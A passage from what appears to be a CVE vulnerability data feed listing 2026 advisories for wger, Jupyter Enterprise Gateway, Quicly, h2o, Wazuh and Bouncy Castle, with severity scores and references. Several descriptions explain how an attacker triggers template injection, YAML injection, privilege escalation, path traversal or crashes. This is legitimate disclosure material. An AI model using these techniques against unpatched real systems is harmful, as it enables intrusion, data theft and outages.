Inc.","product":"BC-LTS","defaultStatus":"unaffected","collectionURL":"https://www.bouncycastle.org/download/bouncy-castle-java-lts/","packageName":"bcprov-lts8on","platforms":["ARM"],"programFiles":["https://github.com/bcgit/bc-lts-java/blob/main/native_c/arm/sha/shake.c","https://github.com/bcgit/bc-lts-java/blob/main/native_c/arm/sha/sha3.c"],"repo":"https://github.com/bcgit/bc-lts-java","versions":[{"version":"2.73.0","lessThan":"2.73.12.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"91579145-5d7b-4cc5-b925-a0262ff19630","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:A/V:D/RE:M/U:Amber","baseScore":1.7,"baseSeverity":"LOW","attackVector":"LOCAL","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"UNREPORTED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"PRESENT","Automatable":"NO","Recovery":"AUTOMATIC","valueDensity":"DIFFUSE","vulnerabilityResponseEffort":"MODERATE","providerUrgency":"AMBER"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:12:14.471058Z","id":"CVE-2026-15997","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"91579145-5d7b-4cc5-b925-a0262ff19630","type":"Secondary","description":[{"lang":"en","value":"CWE-787"}]}],"references":[{"url":"https://github.com/bcgit/bc-lts-java/wiki/CVE-2026-15997","source":"91579145-5d7b-4cc5-b925-a0262ff19630"}]}},{"cve":{"id":"CVE-2026-43977","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:16.167","lastModified":"2026-07-17T18:42:17.740","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"wger is a free, open-source workout and fitness manager. In versions prior to 2.6, any authenticated user can read another user's private workout session notes, exercise history, and training statistics by calling the /logs/ and /stats/ actions on a routine they do not own. The vulnerability exists in RoutineViewSet (wger/manager/api/views.py). The view defines two custom actions /logs/ and /stats/ that are intended to return data for the requesting user's own training history within a routine. However, the underlying permission check (RoutinePermission.has_object_permission) grants read access to any authenticated user when the routine has is_template=True, regardless of ownership. When the /logs/ or /stats/ actions are invoked against a routine the attacker does not own, they return the owner's private workout history, not the attacker's. This issue has been fixed in version 2.6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wger-project","product":"wger","versions":[{"version":"< 2.6","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:14:26.159335Z","id":"CVE-2026-43977","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-639"},{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/wger-project/wger/security/advisories/GHSA-cj9g-27ph-4cgv","source":"security-advisories@github.com"},{"url":"https://github.com/wger-project/wger/security/advisories/GHSA-cj9g-27ph-4cgv","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-43978","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:16.310","lastModified":"2026-07-17T18:42:17.740","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"wger is a free, open-source workout and fitness manager. In versions prior to 2.6, a gym trainer can escalate their session to any higher-privileged account (gym manager, general manager) by chaining two calls to the trainer-login endpoint. Once a trainer performs a legitimate switch into a low-privileged user, the session flag trainer.identity is set and this flag alone bypasses the permission check on all subsequent trainer-login calls. This grants full gym administration capabilities including viewing all member data, modifying contracts, managing gym configuration, and accessing other trainers' and managers' personal information. This issue has been fixed in version 2.6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wger-project","product":"wger","versions":[{"version":"< 2.6","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:49:18.653519Z","id":"CVE-2026-43978","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-269"}]}],"references":[{"url":"https://github.com/wger-project/wger/security/advisories/GHSA-9qpr-vc49-hqg2","source":"security-advisories@github.com"},{"url":"https://github.com/wger-project/wger/security/advisories/GHSA-9qpr-vc49-hqg2","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-44181","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:16.453","lastModified":"2026-07-17T18:35:23.877","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Jupyter Enterprise Gateway launches remote Jupyter Notebook kernels across distributed clusters like Apache Spark, Kubernetes, and Docker Swarm. In versions 2.0.0rc2 and above, prior to 3.3.0, the environment variables (KERNEL_XXX) used during the rendering of the Kubernetes manifest are vulnerable to Server Side Template Injection (SSTI). By including Jinja2 template expressions it is possible to execution Python code and OS Commands in the Enterprise Gateway service. The code can use or steal the Kubernetes service account token, which can steal Kubernetes secrets and be used to fully compromise the Kubernetes cluster by scheduling a privileged pod or a pod with a hostPath volume mount. This issue has been fixed in version 3.3.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"jupyter-server","product":"enterprise_gateway","versions":[{"version":">= 2.0.0rc2, < 3.3.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":10.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:04:32.784412Z","id":"CVE-2026-44181","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-1336"}]}],"references":[{"url":"https://github.com/jupyter-server/enterprise_gateway/releases/tag/v3.3.0","source":"security-advisories@github.com"},{"url":"https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-f49j-v924-fx9w","source":"security-advisories@github.com"},{"url":"https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-f49j-v924-fx9w","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-44182","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:16.590","lastModified":"2026-07-17T18:35:23.877","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Jupyter Enterprise Gateway launches remote Jupyter Notebook kernels across distributed clusters like Apache Spark, Kubernetes, and Docker Swarm. In versions prior to 3.3.0, the server interpolates untrusted environment variables (e.g., KERNEL_XXX) into Kubernetes manifests without YAML-aware escaping, enabling YAML injection attacks. Attackers can inject new fields, overwrite critical fields (e.g., duplicate securityContext keys, where the last one prevails), and inject document boundaries (--- for new documents, ... for end-of-document) to generate multiple resources, potentially creating arbitrary types, such as privileged pods. The Jinja2 template for the Kubernetes manifest contains several kernel_xxx variables, such as kernel_working_dir that are used when rendering the manifest and are all vectors for YAML injection. This issue has been fixed in version 3.3.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"jupyter-server","product":"enterprise_gateway","versions":[{"version":"< 3.3.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":10.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:04:35.101845Z","id":"CVE-2026-44182","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-74"}]}],"references":[{"url":"https://github.com/jupyter-server/enterprise_gateway/releases/tag/v3.3.0","source":"security-advisories@github.com"},{"url":"https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-cfw7-6c5v-2wjq","source":"security-advisories@github.com"},{"url":"https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-cfw7-6c5v-2wjq","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-44433","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:16.727","lastModified":"2026-07-17T19:17:13.800","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Quicly is an IETF QUIC protocol implementation intended primarily for use within the H2O HTTP server. Prior to commit 8b178e6, an adversarial peer could send a STREAM frame carrying just one byte at the largest offset being permitted to obtain additional flow control credit, which under certain circumstances could lead to a Denial of Service. Assuming the application prepares a receive buffer for storing all data that arrive out-of-order, up to the largest offset being received, this behavior could lead to the application allocating large amount of memory with the peer sending only a handful of packets, resulting in memory exhaustion. In addition to the receive buffer allocation strategy, the severity of this vulnerability depends on how the application controls the stream concurrency. In case of the H2O HTTP server, under its default setting, this bug increases the maximum amount of memory allocated per connection by about 4 times. This issue has been fixed by commit 8b178e6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"h2o","product":"quicly","versions":[{"version":"< 8b178e6","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:26:30.321361Z","id":"CVE-2026-44433","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/h2o/quicly/commit/8b178e692c51a3b1031612ef89f03a53aac63c15","source":"security-advisories@github.com"},{"url":"https://github.com/h2o/quicly/security/advisories/GHSA-f7qr-4p37-9gx9","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44435","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:17.010","lastModified":"2026-07-17T18:34:36.267","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Quicly is an IETF QUIC protocol implementation intended primarily for use within the H2O HTTP server. Prior to commit 937d0e9, an assertion failure is raised when the total number of valid handshake messages received over a CRYPTO stream of a single packet number space exceeds 32KB, causing a Denial of Service. This issue has been fixed by commit 937d0e9."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"h2o","product":"quicly","versions":[{"version":"< 937d0e9","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:02:47.698484Z","id":"CVE-2026-44435","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-617"}]}],"references":[{"url":"https://github.com/h2o/quicly/commit/937d0e9e7c669fc2bee4920632ab6aaac60e4d81","source":"security-advisories@github.com"},{"url":"https://github.com/h2o/quicly/security/advisories/GHSA-2cw9-5673-73gv","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44436","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:17.143","lastModified":"2026-07-17T18:37:25.590","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Quicly is an IETF QUIC protocol implementation intended primarily for use within the H2O HTTP server. Prior to commit 8b178e6, Quicly is vulnerable to a Denial of Service attack through connection state corruption. In QUIC Invariants, the maximum length of a Connection ID is 255 bytes, while QUIC version 1 further restricts the maximum to 20 bytes. Quicly implements QUIC version 1 and therefore its CID buffers are limited to 20 bytes. However, to be able to respond to unknown versions of QUIC, its packet decoder accepts Connection IDs of up to 255 bytes. As its CID buffers are merely 20 bytes long, Quicly must reject QUIC version 1 packets with Connection IDs longer than that. The command line tool bundled with Quicly has had that check, however the library itself lacked such enforcement. As a consequence, when used by applications that lack their own enforcement, the connection state becoming inconsistent to buffer overrun. Fortunately, the overflow stops within the allocated chunk of memory, but nevertheless, the bug leads to assertion failures. This issue has been fixed by commit 8b178e6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"h2o","product":"quicly","versions":[{"version":"< 8b178e6","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:48:23.373806Z","id":"CVE-2026-44436","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-120"},{"lang":"en","value":"CWE-787"}]}],"references":[{"url":"https://github.com/h2o/quicly/commit/8b178e692c51a3b1031612ef89f03a53aac63c15","source":"security-advisories@github.com"},{"url":"https://github.com/h2o/quicly/security/advisories/GHSA-v55w-59qx-2v78","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44452","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:17.280","lastModified":"2026-07-17T18:37:25.590","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. Prior to commit 8dc37cb, when h2o receives a ClientHello message over TLS or QUIC and it contains a zero-length SNI extension, the h2o server runs over the zero-length hostname while trying to copy the hostname, assuming that it is NULL-terminated. This is a potential denial-of-service attack vector in sense that it might trigger segmentation violation. This issue has been fixed by commit 8dc37cb."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"h2o","product":"h2o","versions":[{"version":"< 8dc37cb","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:03:32.725590Z","id":"CVE-2026-44452","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-125"},{"lang":"en","value":"CWE-170"}]}],"references":[{"url":"https://github.com/h2o/h2o/commit/8dc37cb1e6171f7f772667618ea440696fed82c3","source":"security-advisories@github.com"},{"url":"https://github.com/h2o/h2o/security/advisories/GHSA-w68q-rqwx-7wvq","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44453","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T23:16:17.423","lastModified":"2026-07-17T18:37:25.590","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. Prior to commit 6b5370d, h2o is vulnerable to a Denial of Service attack when calling alloca under certain conditions. When serving static files, h2o builds the file path on stack, by calling alloca. The maximum size of the memory allocated using alloca can be as huge as ~600KB, which exceeds the default pthread stack size used by musl libc (128KB). If the amount of memory allocated by alloca exceeds the stack size, the h2o server crashes with a segmentation fault, while it tries to touch the guard page. This issue has been fixed by commit 6b5370d."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"h2o","product":"h2o","versions":[{"version":"< 6b5370d","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:29:07.563010Z","id":"CVE-2026-44453","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"},{"lang":"en","value":"CWE-789"}]}],"references":[{"url":"https://github.com/h2o/h2o/commit/6b5370d9d09fcf83aa7620ddf77de1954a192181","source":"security-advisories@github.com"},{"url":"https://github.com/h2o/h2o/security/advisories/GHSA-rf9v-m59p-mq84","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-33754","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T00:16:25.383","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 3.9.0 and above, prior to 4.14.5, a remote attacker can trigger memory exhaustion in the cluster protocol parser by sending a crafted message header with an arbitrarily large payload length. The length is trusted before authentication/decryption and used directly to allocate memory, allowing unauthenticated denial of service of the cluster service. This issue has been fixed in version 4.14.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wazuh","product":"wazuh","versions":[{"version":">= 3.9.0, < 4.14.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:16:09.606354Z","id":"CVE-2026-33754","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"references":[{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-476v-28pp-5wg9","source":"security-advisories@github.com"},{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-476v-28pp-5wg9","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-34150","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T00:16:25.520","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 1.0.0 and above, prior to 4.14.5, a heap buffer overflow in wazuh-analysisd allows an unauthenticated remote attacker to crash the Wazuh manager's analysis engine, causing complete loss of SIEM alert processing. The attack exploits the default configuration shipped in the official wazuh/wazuh-docker deployment with default configuration. An attacker can enroll with authd without a password to obtain a valid agent ID and encryption key, connect to remoted over the Wazuh agent protocol, and inject rootcheck events containing  {key: value}  patterns longer than 30 bytes that trigger a sprintf overflow of a 30-byte buffer in W_JSON_ParseRootcheck, corrupting the heap and crashing wazuh-analysisd so that all alert processing silently stops while the dashboard and API keep showing stale data."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wazuh","product":"wazuh","versions":[{"version":">= 1.0.0, < 4.14.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:46:57.732790Z","id":"CVE-2026-34150","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-122"}]}],"references":[{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-rvr9-89q8-w883","source":"security-advisories@github.com"},{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-rvr9-89q8-w883","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-39359","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T00:16:25.663","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 4.0.0 through 4.10.3 and 4.11.0 through 4.14.4, a logic flaw affects the Wazuh Manager's enrollment daemon (authd) and synchronization daemon (remoted). The authd process allows agents to select a group during enrollment but does not filter path traversal sequences such as \"...\" While the manager checks for the group directory using wopendir(), the \"..\" sequence references the parent directory (/var/ossec/etc), allowing it to pass validation. After the malicious group is accepted and stored in the manager's global database, the remoted process uses this unchecked value to build paths for agent configuration synchronization. As a result, sensitive files from /var/ossec/etc, such as client.keys, ossec.conf, and internal certificates, are included in the agent's shared configuration stream and exposed to the attacker. This issue has been fixed in versions 4.10.4 and 